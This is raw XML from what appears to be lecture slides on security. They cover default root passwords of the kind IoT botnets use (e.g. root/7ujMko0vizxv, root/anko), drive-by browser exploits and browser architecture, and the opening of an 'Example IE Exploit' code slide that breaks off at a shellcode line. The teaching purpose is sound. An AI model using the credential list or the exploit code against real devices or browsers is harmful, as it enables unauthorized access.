                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="459616832"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>54321</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2438087198"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>666666</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1470102732"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>7ujMko0admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2007694998"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>7ujMko0vizxv</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2757361695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>888888</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1319422006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>admin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3059440310"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>anko</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2143676266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>default</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2081871218"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>dreambox</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="804672808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2085804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A0845-E7B0-48C1-BB4A-675B9BA3F88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drive-by Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C268B36-3ACB-46D3-91AF-B1DBD1355330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers are extremely complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Millions of lines of source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rely on equally complex plugins from third-party developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. Adobe Flash, Microsoft Silverlight, Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must deal with untrusted, complex inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network packets from arbitrary servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML/XML, JavaScript, stylesheets, images, video, audio, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a recipe for disaster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker directs the victim to a website containing malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverage exploits in the browser to attack the OS and gain persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142998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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1929229" y="4151754"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639"/>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p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2994551" y="3342806"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864"/>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Modern Browser Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721770" y="3082609"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Model and Renderer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994551" y="3082609"/>
            <a:ext cx="1805940" cy="520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HTML Parser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5279943" y="3897387"/>
            <a:ext cx="2264913" cy="382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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4800491" y="3342806"/>
            <a:ext cx="1420850"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5581" y="2955989"/>
            <a:ext cx="744114" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2154271" y="3342806"/>
            <a:ext cx="840280" cy="548752"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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994551" y="4700508"/>
            <a:ext cx="1805940" cy="520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CSS Parser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3187383" y="3891558"/>
            <a:ext cx="1420850" cy="520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JS Runtime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4608233" y="4138901"/>
            <a:ext cx="1613108" cy="8937"/>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360165" y="3769569"/>
            <a:ext cx="370614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4800491" y="4988683"/>
            <a:ext cx="1420850"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83221" y="4610414"/>
            <a:ext cx="524504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109012" y="3603003"/>
            <a:ext cx="287" cy="288555"/>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0" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2133375" y="4457455"/>
            <a:ext cx="861177" cy="503251"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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1" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2134702" y="4151755"/>
            <a:ext cx="1052681" cy="89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0" name="Flowchart: Magnetic Disk 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925915" y="5259889"/>
            <a:ext cx="1003313" cy="88329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Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3814739" y="3335392"/>
            <a:ext cx="712150" cy="4483171"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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668676" y="5556630"/>
            <a:ext cx="926857" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture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1336" y="1690688"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Arrow Connector 81"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3702198" y="3598184"/>
            <a:ext cx="5556" cy="287642"/>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4201855" y="4411952"/>
            <a:ext cx="287" cy="28855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9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2262F95F-2CEA-461B-9797-0B01807335A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343995" y="1869693"/>
            <a:ext cx="4366927" cy="4623181"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers handle many types of complex input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML/XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stylesheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Images/video/audio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java and Flash bytecode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parsing bugs may be exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript gives attackers the ability to stage exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320259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8703-6B71-4744-AA60-FAC67EB1BFF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="42397"/>
            <a:ext cx="10515600" cy="740522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example IE Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E9F354-6115-4DA8-8908-09852C4EB3FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="240554" y="859722"/>
            <a:ext cx="12025728"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AA7700"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$exploit</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'&lt;html&gt;'</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'&lt;div id="</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msie_xmlbof_vista</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;x&lt;/div&gt;'</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'&lt;script&gt;'</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shellcode = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
